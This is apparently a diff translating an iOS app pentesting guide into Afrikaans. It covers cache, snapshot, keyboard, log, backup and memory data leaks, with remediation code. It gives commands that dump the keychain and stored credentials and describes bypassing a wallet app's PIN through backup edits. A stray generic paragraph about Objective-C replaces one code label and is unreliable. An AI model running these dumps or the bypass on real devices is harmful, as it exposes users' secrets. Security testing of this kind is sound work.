get`.**\ +**Jy kan ook objection gebruik om hierdie lêers na 'n JSON-formaat te omskep en die data te ondersoek.** ```bash ...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios cookies get --json [ - { - "domain": "highaltitudehacks.com", - "expiresDate": "2051-09-15 07:46:43 +0000", - "isHTTPOnly": "false", - "isSecure": "false", - "name": "username", - "path": "/", - "value": "admin123", - "version": "0" - } +{ +"domain": "highaltitudehacks.com", +"expiresDate": "2051-09-15 07:46:43 +0000", +"isHTTPOnly": "false", +"isSecure": "false", +"name": "username", +"path": "/", +"value": "admin123", +"version": "0" +} ] ``` - ### Cache -By default NSURLSession stores data, such as **HTTP requests and responses in the Cache.db** database. This database can contain **sensitive data**, if tokens, usernames or any other sensitive information has been cached. To find the cached information open the data directory of the app (`/var/mobile/Containers/Data/Application/`) and go to `/Library/Caches/`. The **WebKit cache is also being stored in the Cache.db** file. **Objection** can open and interact with the database with the command `sqlite connect Cache.db`, as it is a n**ormal SQLite database**. +Standaard stoor NSURLSession data, soos **HTTP-aanvrae en -antwoorde in die Cache.db** databasis. Hierdie databasis kan **sensitiewe data** bevat, as tokens, gebruikersname of enige ander sensitiewe inligting gestoor is. Om die gestoorde inligting te vind, open die data-gids van die app (`/var/mobile/Containers/Data/Application/`) en gaan na `/Library/Caches/`. Die **WebKit-cache word ook in die Cache.db**-lêer gestoor. **Objection** kan die databasis oopmaak en daarmee interaksie hê met die opdrag `sqlite connect Cache.db`, aangesien dit 'n **normale SQLite-databasis** is. -It is **recommended to disable Caching this data**, as it may contain sensitive information in the request or response. The following list below shows different ways of achieving this: +Dit word **aanbeveel om hierdie data se caching uit te skakel**, aangesien dit sensitiewe inligting in die versoek of antwoord kan bevat. Die volgende lys toon verskillende maniere om dit te bereik: -1. It is recommended to remove Cached responses after logout. This can be done with the provided method by Apple called [`removeAllCachedResponses`](https://developer.apple.com/documentation/foundation/urlcache/1417802-removeallcachedresponses) You can call this method as follows: +1. Dit word aanbeveel om gestoorde antwoorde te verwyder na afmelding. Dit kan gedoen word met die metode wat deur Apple voorsien word, genaamd [`removeAllCachedResponses`](https://developer.apple.com/documentation/foundation/urlcache/1417802-removeallcachedresponses). Jy kan hierdie metode so oproep: - `URLCache.shared.removeAllCachedResponses()` +`URLCache.shared.removeAllCachedResponses()` - This method will remove all cached requests and responses from Cache.db file. -2. If you don't need to use the advantage of cookies it would be recommended to just use the [.ephemeral](https://developer.apple.com/documentation/foundation/urlsessionconfiguration/1410529-ephemeral) configuration property of URLSession, which will disable saving cookies and Caches. +Hierdie metode sal alle gestoorde versoek en antwoorde uit die Cache.db-lêer verwyder. +2. As jy nie die voordeel van koekies hoef te gebruik nie, word dit aanbeveel om net die [.ephemeral](https://developer.apple.com/documentation/foundation/urlsessionconfiguration/1410529-ephemeral) konfigurasie-eienskap van URLSession te gebruik, wat die stoor van koekies en Cache uitskakel. - [Apple documentation](https://developer.apple.com/documentation/foundation/urlsessionconfiguration/1410529-ephemeral): +[Apple-dokumentasie](https://developer.apple.com/documentation/foundation/urlsessionconfiguration/1410529-ephemeral): - `An ephemeral session configuration object is similar to a default session configuration (see default), except that the corresponding session object doesn’t store caches, credential stores, or any session-related data to disk. Instead, session-related data is stored in RAM. The only time an ephemeral session writes data to disk is when you tell it to write the contents of a URL to a file.` -3. Cache can be also disabled by setting the Cache Policy to [.notAllowed](https://developer.apple.com/documentation/foundation/urlcache/storagepolicy/notallowed). It will disable storing Cache in any fashion, either in memory or on disk. +`'n Ephemeral-sessiekonfigurasie-objek is soortgelyk aan 'n verstek-sessiekonfigurasie (sien verstek), behalwe dat die ooreenstemmende sessie-objek nie Cache, geloofsbriewestoorplekke of enige sessie-verwante data na skyf stoor nie. In plaas daarvan word sessie-verwante data in RAM gestoor. Die enigste keer wat 'n ephemeral-sessie data na skyf skryf, is wanneer jy dit sê om die inhoud van 'n URL na 'n lêer te skryf.` +3. Cache kan ook uitgeskakel word deur die Cache-beleid in te stel op [.notAllowed](https://developer.apple.com/documentation/foundation/urlcache/storagepolicy/notallowed). Dit sal die stoor van Cache in enige vorm, hetsy in geheue of op skyf, uitskakel. ### Snapshots -Whenever you press the home button, iOS **takes a snapshot of the current screen** to be able to do the transition to the application on a much smoother way. However, if **sensitive** **data** is present in the current screen, it will be **saved** in the **image** (which **persists** **across** **reboots**). These are the snapshots that you can also access double tapping the home screen to switch between apps. +Telkens as jy die tuisknoppie druk, neem iOS **'n skermafdruk van die huidige skerm** om die oorgang na die toepassing baie vlotter te maak. As daar egter **sensitiewe data** in die huidige skerm is, sal dit in die **beeld gestoor word** (wat **oorleef** **herlaaiings**). Dit is die skermafdrukke wat jy ook kan toegang deur dubbel te tik op die tuisskerm om tussen programme te skakel. -Unless the iPhone is jailbroken, the **attacker** needs to have **access** to the **device** **unblocked** to see these screenshots. By default the last snapshot is stored in the application's sandbox in `Library/Caches/Snapshots/` or `Library/SplashBoard/Snapshots` folder (the trusted computers can' t access the filesystem from iOX 7.0). +Tensy die iPhone gejailbreak is, moet die **aanvaller** toegang tot die **ontgrendelde toestel** hê om hierdie skermafdrukke te sien. Standaard word die laaste skermafdruk gestoor in die toepassing se sandput in die `Library/Caches/Snapshots/` of `Library/SplashBoard/Snapshots`-gids (vertroude rekenaars kan nie die lêersisteem vanaf iOS 7.0 toegang nie). -Once way to prevent this bad behaviour is to put a blank screen or remove the sensitive data before taking the snapshot using the `ApplicationDidEnterBackground()` function. +Een manier om hierdie slegte gedrag te voorkom, is om 'n leë skerm te plaas of die sensitiewe data te verwyder voordat die skermafdruk geneem word deur die `ApplicationDidEnterBackground()`-funksie te gebruik. -The following is a sample remediation method that will set a default screenshot. +Die volgende is 'n voorbeeld van 'n herstelmetode wat 'n verstekskermafdruk sal instel. Swift: - ```swift private var backgroundImage: UIImageView? func applicationDidEnterBackground(_ application: UIApplication) { - let myBanner = UIImageView(image: #imageLiteral(resourceName: "overlayImage")) - myBanner.frame = UIScreen.main.bounds - backgroundImage = myBanner - window?.addSubview(myBanner) +let myBanner = UIImageView(image: #imageLiteral(resourceName: "overlayImage")) +myBanner.frame = UIScreen.main.bounds +backgroundImage = myBanner +window?.addSubview(myBanner) } func applicationWillEnterForeground(_ application: UIApplication) { - backgroundImage?.removeFromSuperview() +backgroundImage?.removeFromSuperview() } ``` - Objective-C: +Objective-C is 'n objekgeoriënteerde programmeertaal wat gebruik word vir die ontwikkeling van iOS-toepassings. Dit is 'n uitbreiding van die C-programmeertaal en voeg 'n stel objekgeoriënteerde funksies en sintaksis by. Objective-C is die primêre programmeertaal wat gebruik word vir die ontwikkeling van iOS-toepassings voordat Swift bekend gestel is. + +Objective-C is 'n kragtige taal wat 'n groot verskeidenheid funksies en biblioteke bied vir die ontwikkeling van iOS-toepassings. Dit maak gebruik van 'n sintaksis wat bekend staan as "message passing" om met objekte te kommunikeer. Hierdie sintaksis maak dit moontlik om metode-oproepe na objekte te maak en data tussen objekte te stuur. + +Objective-C bied ook 'n sterk refleksie-meganisme wat dit moontlik maak om objekte te ondersoek en te manipuleer tydens uitvoering. Hierdie refleksie-meganisme kan gebruik word vir gevorderde tegnieke soos swak punte-ontleding en dinamiese kode-generering. + +As jy belangstel in die ontwikkeling van iOS-toepassings, is dit belangrik om 'n goeie begrip van Objective-C te hê. Dit sal jou help om die iOS-raamwerk en biblioteke te verstaan en om effektiewe en kragtige toepassings te ontwikkel. ``` @property (UIImageView *)backgroundImage; - (void)applicationDidEnterBackground:(UIApplication *)application { - UIImageView *myBanner = [[UIImageView alloc] initWithImage:@"overlayImage.png"]; - self.backgroundImage = myBanner; - self.backgroundImage.bounds = UIScreen.mainScreen.bounds; - [self.window addSubview:myBanner]; +UIImageView *myBanner = [[UIImageView alloc] initWithImage:@"overlayImage.png"]; +self.backgroundImage = myBanner; +self.backgroundImage.bounds = UIScreen.mainScreen.bounds; +[self.window addSubview:myBanner]; } - (void)applicationWillEnterForeground:(UIApplication *)application { - [self.backgroundImage removeFromSuperview]; +[self.backgroundImage removeFromSuperview]; } ``` +Hierdie stel die agtergrondbeeld na `overlayImage.png` wanneer die toepassing agtergrond toegepas word. Dit voorkom dat sensitiewe data uitlek omdat `overlayImage.png` altyd die huidige aansig sal oorskryf. -This sets the background image to `overlayImage.png` whenever the application is backgrounded. It prevents sensitive data leaks because `overlayImage.png` will always override the current view. +### Sleutelbos -### Keychain +Vir toegang tot en bestuur van die iOS-sleutelbos, is daar gereedskap soos [**Keychain-Dumper**](https://github.com/ptoomey3/Keychain-Dumper) beskikbaar, wat geskik is vir gejailbreakte toestelle. Daarbenewens bied [**Objection**](https://github.com/sensepost/objection) die opdrag `ios keychain dump` vir soortgelyke doeleindes. -For accessing and managing the iOS keychain, tools like [**Keychain-Dumper**](https://github.com/ptoomey3/Keychain-Dumper) are available, suitable for jailbroken devices. Additionally, [**Objection**](https://github.com/sensepost/objection) provides the command `ios keychain dump` for similar purposes. - -#### **Storing Credentials** - -The **NSURLCredential** class is ideal for saving sensitive information directly in the keychain, bypassing the need for NSUserDefaults or other wrappers. To store credentials after login, the following Swift code is used: +#### **Bewaring van Geldele** +Die **NSURLCredential**-klas is ideaal vir die stoor van sensitiewe inligting direk in die sleutelbos, sonder die behoefte aan NSUserDefaults of ander omhulsels. Om geldele na aanmelding te stoor, word die volgende Swift-kode gebruik: ```swift NSURLCredential *credential; credential = [NSURLCredential credentialWithUser:username password:password persistence:NSURLCredentialPersistencePermanent]; [[NSURLCredentialStorage sharedCredentialStorage] setCredential:credential forProtectionSpace:self.loginProtectionSpace]; ``` +Om hierdie gestoorde geloofsbriewe te onttrek, word die bevel `ios nsurlcredentialstorage dump` van Objection gebruik. -To extract these stored credentials, Objection's command `ios nsurlcredentialstorage dump` is utilized. +## **Aangepaste Sleutelborde en Sleutelbord Cache** -## **Custom Keyboards and Keyboard Cache** +Met iOS 8.0 en later kan gebruikers aangepaste sleutelborduitbreidings installeer, wat bestuurbaar is onder **Instellings > Algemeen > Sleutelbord > Sleutelborde**. Terwyl hierdie sleutelborde uitgebreide funksionaliteit bied, stel dit 'n risiko van sleutelbordlogboekinskrywing en die oordra van data na eksterne bedieners, alhoewel gebruikers in kennis gestel word van sleutelborde wat netwerktoegang vereis. Apps kan, en moet, die gebruik van aangepaste sleutelborde vir sensitiewe inligting beperk. -With iOS 8.0 onwards, users can install custom keyboard extensions, which are manageable under **Settings > General > Keyboard > Keyboards**. While these keyboards offer extended functionality, they pose a risk of keystroke logging and transmitting data to external servers, though users are notified about keyboards requiring network access. Apps can, and should, restrict the use of custom keyboards for sensitive information entry. +**Veiligheidsaanbevelings:** +- Dit word aanbeveel om derdeparty-sleutelborde te deaktiveer vir verbeterde veiligheid. +- Wees bewus van die outokorreksie en outo-voorstel funksies van die verstek iOS-sleutelbord, wat sensitiewe inligting in kaslêers wat in `Library/Keyboard/{locale}-dynamic-text.dat` of `/private/var/mobile/Library/Keyboard/dynamic-text.dat` geleë is, kan stoor. Hierdie kaslêers moet gereeld nagegaan word vir sensitiewe data. Dit word aanbeveel om die sleutelbordwoordeboek te herstel via **Instellings > Algemeen > Herstel > Herstel Sleutelbordwoordeboek** om gekasheerde data te skoonmaak. +- Die onderskepping van netwerkverkeer kan onthul of 'n aangepaste sleutelbord sleutelinskrywings op afstand oordra. -**Security Recommendations:** -- It's advised to disable third-party keyboards for enhanced security. -- Be aware of the autocorrect and auto-suggestions features of the default iOS keyboard, which could store sensitive information in cache files located in `Library/Keyboard/{locale}-dynamic-text.dat` or `/private/var/mobile/Library/Keyboard/dynamic-text.dat`. These cache files should be regularly checked for sensitive data. Resetting the keyboard dictionary via **Settings > General > Reset > Reset Keyboard Dictionary** is recommended for clearing cached data. -- Intercepting network traffic can reveal whether a custom keyboard is transmitting keystrokes remotely. - -### **Preventing Text Field Caching** - -The [UITextInputTraits protocol](https://developer.apple.com/reference/uikit/uitextinputtraits) offers properties to manage autocorrection and secure text entry, essential for preventing sensitive information caching. For example, disabling autocorrection and enabling secure text entry can be achieved with: +### **Voorkoming van Teksveldkasgebruik** +Die [UITextInputTraits-protokol](https://developer.apple.com/reference/uikit/uitextinputtraits) bied eienskappe om outokorreksie en veilige teksinskrywing te bestuur, wat noodsaaklik is vir die voorkoming van die kasgebruik van sensitiewe inligting. Byvoorbeeld, die deaktivering van outokorreksie en die aktivering van veilige teksinskrywing kan bereik word met: ```objectivec textObject.autocorrectionType = UITextAutocorrectionTypeNo; textObject.secureTextEntry = YES; ``` - -Additionally, developers should ensure that text fields, especially those for entering sensitive information like passwords and PINs, disable caching by setting `autocorrectionType` to `UITextAutocorrectionTypeNo` and `secureTextEntry` to `YES`. - +Daarbenewens moet ontwikkelaars verseker dat teksvelde, veral dié vir die invoer van sensitiewe inligting soos wagwoorde en PIN-kodes, die gebruik van 'n cache deaktiveer deur `autocorrectionType` in te stel op `UITextAutocorrectionTypeNo` en `secureTextEntry` op `YES`. ```objectivec UITextField *textField = [[UITextField alloc] initWithFrame:frame]; textField.autocorrectionType = UITextAutocorrectionTypeNo; ``` - ## **Logs** -Debugging code often involves the use of **logging**. There's a risk involved as **logs may contain sensitive information**. Previously, in iOS 6 and earlier versions, logs were accessible to all apps, posing a risk of sensitive data leakage. **Now, applications are restricted to accessing only their logs**. +Foutopsporingskode behels dikwels die gebruik van **logging**. Daar is 'n risiko betrokke aangesien **logs sensitiewe inligting kan bevat**. Voorheen, in iOS 6 en vorige weergawes, was logs toeganklik vir alle programme, wat 'n risiko van lekkasie van sensitiewe data inhou. **Nou is programme beperk tot toegang tot slegs hul eie logs**. -Despite these restrictions, an **attacker with physical access** to an unlocked device can still exploit this by connecting the device to a computer and **reading the logs**. It is important to note that logs remain on the disk even after the app's uninstallation. +Ten spyte van hierdie beperkings kan 'n **aanvaller met fisiese toegang** tot 'n ontgrendelde toestel dit steeds uitbuit deur die toestel aan 'n rekenaar te koppel en die logs te lees. Dit is belangrik om daarop te let dat logs op die skyf bly selfs nadat die toepassing gedeïnstalleer is. -To mitigate risks, it is advised to **thoroughly interact with the app**, exploring all its functionalities and inputs to ensure no sensitive information is being logged inadvertently. +Om risiko's te verminder, word dit aanbeveel om **deeglik met die toepassing te interaksieer**, deur al sy funksionaliteite en insette te verken om te verseker dat geen sensitiewe inligting onbedoeld geregistreer word nie. -When reviewing the app's source code for potential leaks, look for both **predefined** and **custom logging statements** using keywords such as `NSLog`, `NSAssert`, `NSCAssert`, `fprintf` for built-in functions, and any mentions of `Logging` or `Logfile` for custom implementations. +Wanneer jy die bronkode van die toepassing ondersoek vir potensiële lekke, soek na beide **voorgedefinieerde** en **aangepaste loggingverklarings** met sleutelwoorde soos `NSLog`, `NSAssert`, `NSCAssert`, `fprintf` vir ingeboude funksies, en enige verwysings na `Logging` of `Logfile` vir aangepaste implementasies. -### **Monitoring System Logs** - -Apps log various pieces of information which can be sensitive. To monitor these logs, tools and commands like: +### **Monitering van Stelsellogs** +Toepassings registreer verskeie stukke inligting wat sensitief kan wees. Om hierdie logs te monitor, kan gereedskap en opdragte soos: ```bash idevice_id --list # To find the device ID idevicesyslog -u (| grep ) # To capture the device logs ``` +is nuttig. Daarbenewens bied **Xcode** 'n manier om konsole-logboeke te versamel: -are useful. Additionally, **Xcode** provides a way to collect console logs: - -1. Open Xcode. -2. Connect the iOS device. -3. Navigate to **Window** -> **Devices and Simulators**. -4. Select your device. -5. Trigger the issue you're investigating. -6. Use the **Open Console** button to view logs in a new window. - -For more advanced logging, connecting to the device shell and using **socat** can provide real-time log monitoring: +1. Maak Xcode oop. +2. Verbind die iOS-toestel. +3. Navigeer na **Window** -> **Devices and Simulators**. +4. Kies jou toestel. +5. Trigger die probleem wat jy ondersoek. +6. Gebruik die **Open Console**-knoppie om logboeke in 'n nuwe venster te sien. +Vir meer gevorderde logboekhouding kan die verbind van die toestel se skulp en die gebruik van **socat** werkliktyd-logmonitoring bied: ```bash iPhone:~ root# socat - UNIX-CONNECT:/var/run/lockdown/syslog.sock ``` - -Followed by commands to observe log activities, which can be invaluable for diagnosing issues or identifying potential data leakage in logs. +Gevolg deur bevele om logaktiwiteite waar te neem, wat van onschatbare waarde kan wees vir die diagnose van probleme of die identifisering van potensiële datalekke in logboeke. *** @@ -717,58 +675,55 @@ Followed by commands to observe log activities, which can be invaluable for diag
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer wat aangedryf word deur die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Backups +## Agteruitkopieë -**Auto-backup features** are integrated into iOS, facilitating the creation of device data copies through iTunes (up to macOS Catalina), Finder (from macOS Catalina onward), or iCloud. These backups encompass almost all device data, excluding highly sensitive elements like Apple Pay details and Touch ID configurations. +**Outomatiese agteruitkopieë** is geïntegreer in iOS, wat die skep van toesteldata-afskrifte fasiliteer deur middel van iTunes (tot macOS Catalina), Finder (vanaf macOS Catalina voort) of iCloud. Hierdie agteruitkopieë dek byna alle toesteldata, met uitsondering van hoogs sensitiewe elemente soos Apple Pay besonderhede en Touch ID konfigurasies. -### Security Risks +### Sekuriteitsrisiko's -The inclusion of **installed apps and their data** in backups raises the issue of potential **data leakage** and the risk that **backup modifications could alter app functionality**. It's advised to **not store sensitive information in plaintext** within any app's directory or its subdirectories to mitigate these risks. +Die insluiting van **geïnstalleerde programme en hul data** in agteruitkopieë bring die kwessie van potensiële **datalekke** na vore en die risiko dat **agteruitkopiewysigings programme se funksionaliteit kan verander**. Dit word aanbeveel om **sensitiewe inligting nie in plain text** binne enige program se gids of subgidse te stoor nie om hierdie risiko's te verminder. -### Excluding Files from Backups +### Uitsluiting van lêers uit agteruitkopieë -Files in `Documents/` and `Library/Application Support/` are backed up by default. Developers can exclude specific files or directories from backups using `NSURL setResourceValue:forKey:error:` with the `NSURLIsExcludedFromBackupKey`. This practice is crucial for protecting sensitive data from being included in backups. +Lêers in `Documents/` en `Library/Application Support/` word standaard agteruitgekopieer. Ontwikkelaars kan spesifieke lêers of gidse uitsluit van agteruitkopieë deur gebruik te maak van `NSURL setResourceValue:forKey:error:` met die `NSURLIsExcludedFromBackupKey`. Hierdie praktyk is noodsaaklik om sensitiewe data te beskerm teen insluiting in agteruitkopieë. -### Testing for Vulnerabilities +### Toetsing vir kwesbaarhede -To assess an app's backup security, start by **creating a backup** using Finder, then locate it using guidance from [Apple's official documentation](https://support.apple.com/en-us/HT204215). Analyze the backup for sensitive data or configurations that could be altered to affect app behavior. - -Sensitive information can be sought out using command-line tools or applications like [iMazing](https://imazing.com). For encrypted backups, the presence of encryption can be confirmed by checking the "IsEncrypted" key in the "Manifest.plist" file at the backup's root. +Om die agteruitkopie-sekuriteit van 'n program te assesseer, begin deur 'n agteruitkopie te skep met behulp van Finder, en vind dit dan met behulp van die riglyne van [Apple se amptelike dokumentasie](https://support.apple.com/en-us/HT204215). Analiseer die agteruitkopie vir sensitiewe data of konfigurasies wat gewysig kan word om die program se gedrag te beïnvloed. +Sensitiewe inligting kan opgespoor word met behulp van opdraglyninstrumente of toepassings soos [iMazing](https://imazing.com). Vir geënkripteerde agteruitkopieë kan die teenwoordigheid van enkripsie bevestig word deur die "IsEncrypted" sleutel in die "Manifest.plist" lêer by die agteruitkopie se hoof te kontroleer. ```xml ... - Date - 2021-03-12T17:43:33Z - IsEncrypted - +Date +2021-03-12T17:43:33Z +IsEncrypted + ... ``` +Vir die hanteer van versleutelde rugsteun, kan Python-skripte beskikbaar in [DinoSec se GitHub-opberging](https://github.com/dinosec/iphone-dataprotection/tree/master/python_scripts), soos **backup_tool.py** en **backup_passwd.py**, nuttig wees, alhoewel dit moontlik aanpassings mag vereis vir die verenigbaarheid met die nuutste iTunes/Finder-weergawes. Die [**iOSbackup**-hulpmiddel](https://pypi.org/project/iOSbackup/) is 'n ander opsie vir toegang tot lêers binne wagwoord-beskermde rugsteun. -For dealing with encrypted backups, Python scripts available in [DinoSec's GitHub repo](https://github.com/dinosec/iphone-dataprotection/tree/master/python_scripts), like **backup_tool.py** and **backup_passwd.py**, may be useful, albeit potentially requiring adjustments for compatibility with the latest iTunes/Finder versions. The [**iOSbackup** tool](https://pypi.org/project/iOSbackup/) is another option for accessing files within password-protected backups. +### Wysiging van App-gedrag -### Modifying App Behavior +'n Voorbeeld van die wysiging van app-gedrag deur middel van rugsteun-wysigings word gedemonstreer in die [Bither bitcoin-bewaarbeurs-app](https://github.com/bither/bither-ios), waar die UI-sluitpenkode binne `net.bither.plist` onder die **pin_code**-sleutel gestoor word. Die verwydering van hierdie sleutel uit die plist en die herstel van die rugsteun verwyder die PIN-vereiste en bied onbeperkte toegang. -An example of altering app behavior through backup modifications is demonstrated in the [Bither bitcoin wallet app](https://github.com/bither/bither-ios), where the UI lock PIN is stored within `net.bither.plist` under the **pin_code** key. Removing this key from the plist and restoring the backup removes the PIN requirement, providing unrestricted access. +## Opsomming van Geheuetoetsing vir Sensitiewe Data -## Summary on Memory Testing for Sensitive Data +Wanneer dit kom by die hantering van sensitiewe inligting wat in 'n toepassing se geheue gestoor word, is dit noodsaaklik om die blootstellingsduur van hierdie data te beperk. Daar is twee primêre benaderings om geheue-inhoud te ondersoek: **die skep van 'n geheue-dump** en **die analise van die geheue in werklike tyd**. Beide metodes het hul uitdagings, insluitend die potensiaal om kritieke data tydens die dump-proses of analise te mis. -When dealing with sensitive information stored in an application's memory, it is crucial to limit the exposure time of this data. There are two primary approaches to investigate memory content: **creating a memory dump** and **analyzing the memory in real time**. Both methods have their challenges, including the potential to miss critical data during the dump process or analysis. +## **Ophaling en Analise van 'n Geheue-dump** -## **Retrieving and Analyzing a Memory Dump** - -For both jailbroken and non-jailbroken devices, tools like [objection](https://github.com/sensepost/objection) and [Fridump](https://github.com/Nightbringer21/fridump) allow for the dumping of an app's process memory. Once dumped, analyzing this data requires various tools, depending on the nature of the information you're searching for. - -To extract strings from a memory dump, commands such as `strings` or `rabin2 -zz` can be used: +Vir beide gekraakte en nie-gekraakte toestelle, maak gereedskap soos [objection](https://github.com/sensepost/objection) en [Fridump](https://github.com/Nightbringer21/fridump) dit moontlik om 'n toepassing se prosesgeheue te dump. Nadat dit gedump is, vereis die analise van hierdie data verskeie gereedskap, afhangende van die aard van die inligting wat jy soek. +Om strings uit 'n geheue-dump te onttrek, kan opdragte soos `strings` of `rabin2 -zz` gebruik word: ```bash # Extracting strings using strings command $ strings memory > strings.txt @@ -776,75 +731,68 @@ $ strings memory > strings.txt # Extracting strings using rabin2 $ rabin2 -ZZ memory > strings.txt ``` - -For more detailed analysis, including searching for specific data types or patterns, **radare2** offers extensive search capabilities: - +Vir meer gedetailleerde analise, insluitend die soeke na spesifieke datatipes of patrone, bied **radare2** uitgebreide soekmoontlikhede: ```bash $ r2 [0x00000000]> /? ... ``` +## **Uitvoertydgeheue-analise** -## **Runtime Memory Analysis** - -**r2frida** provides a powerful alternative for inspecting an app's memory in real time, without needing a memory dump. This tool enables the execution of search commands directly on the running application's memory: - +**r2frida** bied 'n kragtige alternatief vir die inspekteer van 'n toepassing se geheue in werklike tyd, sonder om 'n geheue-dump te benodig. Hierdie instrument maak dit moontlik om soekopdragte direk op die lopende toepassing se geheue uit te voer: ```bash $ r2 frida://usb// [0x00000000]> /\ ``` +## Gebroke Kriptografie -## Broken Cryptography +### Swak Sleutelbestuurprosesse -### Poor Key Management Processes +Sommige ontwikkelaars stoor sensitiewe data in die plaaslike stoor en versleutel dit met 'n sleutel wat hardgekodifiseer/voorspelbaar in die kode is. Dit moet nie gedoen word nie, aangesien sommige omkeerwerk dit moontlik maak vir aanvallers om die vertroulike inligting te onttrek. -Some developers save sensitive data in the local storage and encrypt it with a key hardcoded/predictable in the code. This shouldn't be done as some reversing could allow attackers to extract the confidential information. +### Gebruik van Onveilige en/of Verouderde Algoritmes -### Use of Insecure and/or Deprecated Algorithms +Ontwikkelaars moet nie **verouderde algoritmes** gebruik om outorisasie **toetse** uit te voer, data te **stoor** of te **stuur** nie. Sommige van hierdie algoritmes is: RC4, MD4, MD5, SHA1... As **hasings** byvoorbeeld gebruik word om wagwoorde te stoor, moet hasings wat bestand is teen brutaal krag met sout gebruik word. -Developers shouldn't use **deprecated algorithms** to perform authorisation **checks**, **store** or **send** data. Some of these algorithms are: RC4, MD4, MD5, SHA1... If **hashes** are used to store passwords for example, hashes brute-force **resistant** should be used with salt. +### Toets -### Check - -The main checks to perform if to find if you can find **hardcoded** passwords/secrets in the code, or if those are **predictable**, and if the code is using some king of **weak** **cryptography** algorithms. - -It's interesting to know that you can **monitor** some **crypto** **libraries** automatically using **objection** with: +Die belangrikste toetse om uit te voer is om te kyk of jy **hardgekodifiseerde** wagwoorde/geheime in die kode kan vind, of dit **voorspelbaar** is, en of die kode van 'n soort **swak** **kriptografie**-algoritmes gebruik maak. +Dit is interessant om te weet dat jy sommige **kripto**-biblioteke outomaties kan **monitor** deur **objection** te gebruik met: ```swift ios monitor crypt ``` +Vir **meer inligting** oor iOS kriptografiese API's en biblioteke, besoek [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06e-testing-cryptography](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06e-testing-cryptography) -For **more information** about iOS cryptographic APIs and libraries access [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06e-testing-cryptography](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06e-testing-cryptography) +## Plaaslike Verifikasie -## Local Authentication +**Plaaslike verifikasie** speel 'n belangrike rol, veral wanneer dit kom by die beskerming van toegang tot 'n afgeleë eindpunt deur middel van kriptografiese metodes. Die essensie hier is dat sonder behoorlike implementering, plaaslike verifikasiemeganismes omseil kan word. -**Local authentication** plays a crucial role, especially when it concerns safeguarding access at a remote endpoint through cryptographic methods. The essence here is that without proper implementation, local authentication mechanisms can be circumvented. +Apple se **[Plaaslike Verifikasie-raamwerk](https://developer.apple.com/documentation/localauthentication)** en die **[sleutelbos](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html)** bied robuuste API's vir ontwikkelaars om gebruikersverifikasie-dialoge te fasiliteer en geheime data veilig te hanteer. Die Veilige Enclave verseker vingerafdruk-ID vir Touch ID, terwyl Face ID staatmaak op gesigsherkenning sonder om biometriese data in gevaar te stel. -Apple's **[Local Authentication framework](https://developer.apple.com/documentation/localauthentication)** and the **[keychain](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html)** provide robust APIs for developers to facilitate user authentication dialogs and securely handle secret data, respectively. The Secure Enclave secures fingerprint ID for Touch ID, whereas Face ID relies on facial recognition without compromising biometric data. - -To integrate Touch ID/Face ID, developers have two API choices: -- **`LocalAuthentication.framework`** for high-level user authentication without access to biometric data. -- **`Security.framework`** for lower-level keychain services access, securing secret data with biometric authentication. Various [open-source wrappers](https://www.raywenderlich.com/147308/secure-ios-user-data-keychain-touch-id) make keychain access simpler. +Om Touch ID/Face ID te integreer, het ontwikkelaars twee API-keuses: +- **`LocalAuthentication.framework`** vir hoëvlak-gebruikersverifikasie sonder toegang tot biometriese data. +- **`Security.framework`** vir laervlak-sleutelbosdiensetoegang, wat geheime data veilig stel met biometriese verifikasie. Verskeie [oopbron-omhullings](https://www.raywenderlich.com/147308/secure-ios-user-data-keychain-touch-id) maak sleutelbostoegang eenvoudiger. {% hint style="danger" %} -However, both `LocalAuthentication.framework` and `Security.framework` present vulnerabilities, as they primarily return boolean values without transmitting data for authentication processes, making them susceptible to bypassing (refer to [Don't touch me that way, by David Lindner et al](https://www.youtube.com/watch?v=XhXIHVGCFFM)). +Nietemin, beide `LocalAuthentication.framework` en `Security.framework` het kwesbaarhede, aangesien hulle hoofsaaklik boole-waardes teruggee sonder om data vir verifikasieprosesse oor te dra, wat hulle vatbaar maak vir omseiling (verwys na [Don't touch me that way, deur David Lindner et al](https://www.youtube.com/watch?v=XhXIHVGCFFM)). {% endhint %} -### Implementing Local Authentication +### Implementering van Plaaslike Verifikasie -To prompt users for authentication, developers should utilize the **`evaluatePolicy`** method within the **`LAContext`** class, choosing between: -- **`deviceOwnerAuthentication`**: Prompts for Touch ID or device passcode, failing if neither is enabled. -- **`deviceOwnerAuthenticationWithBiometrics`**: Exclusively prompts for Touch ID. +Om gebruikers te vra vir verifikasie, moet ontwikkelaars die **`evaluatePolicy`**-metode binne die **`LAContext`**-klas gebruik en kies tussen: +- **`deviceOwnerAuthentication`**: Vra vir Touch ID of toestel wagwoord, faal as geen van beide geaktiveer is nie. +- **`deviceOwnerAuthenticationWithBiometrics`**: Vra eksklusief vir Touch ID. -A successful authentication is indicated by a boolean return value from **`evaluatePolicy`**, highlighting a potential security flaw. +'n Suksesvolle verifikasie word aangedui deur 'n boole-waarde wat teruggegee word deur **`evaluatePolicy`**, wat 'n potensiële sekuriteitsfout aandui. -### Local Authentication using Keychain +### Plaaslike Verifikasie met Sleutelbos -Implementing **local authentication** in iOS apps involves the use of **keychain APIs** to securely store secret data such as authentication tokens. This process ensures that the data can only be accessed by the user, using their device passcode or biometric authentication like Touch ID. +Die implementering van **plaaslike verifikasie** in iOS-toepassings behels die gebruik van **sleutelbos-API's** om geheime data soos verifikasie-token te veilig stoor. Hierdie proses verseker dat die data slegs deur die gebruiker toeganklik is deur middel van hul toestel wagwoord of biometriese verifikasie soos Touch ID. -The keychain offers the capability to set 